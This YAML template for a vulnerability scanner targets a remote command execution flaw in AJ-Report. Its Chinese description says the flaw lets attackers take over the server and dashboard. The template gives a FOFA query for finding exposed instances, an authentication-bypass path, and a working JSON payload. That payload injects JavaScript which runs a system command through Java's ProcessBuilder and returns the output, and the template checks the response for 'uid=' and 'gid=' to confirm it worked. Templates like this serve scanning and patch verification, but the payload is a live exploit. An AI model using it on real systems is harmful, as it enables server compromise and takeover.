product: AJ-Report
vName: AJ-Report validationRules远程命令执行
type: 命令执行
vID: [ ]
level: 3
vDesc: 该平台可以通过post方式在validationRules参数对应值中进行命令执行，可以获得服务器权限，登陆管理后台接管大屏。如果被不法分子利用，书写反动标语，危害后果十分严重
version: ''
note: ''
search:
  FOFA: title="AJ-Report"
protocol: http
link: https://blog.csdn.net/weixin_70137901/article/details/138522926
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /dataSetParam/verification;swagger-ui/
      json:
        ParamName: ''
        mandatory: true
        paramDesc: ''
        paramType: ''
        requiredFlag: 1
        sampleItem: '1'
        validationRules: function verification(data){a = new java.lang.ProcessBuilder("id").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - uid=
              - gid=
            logic: and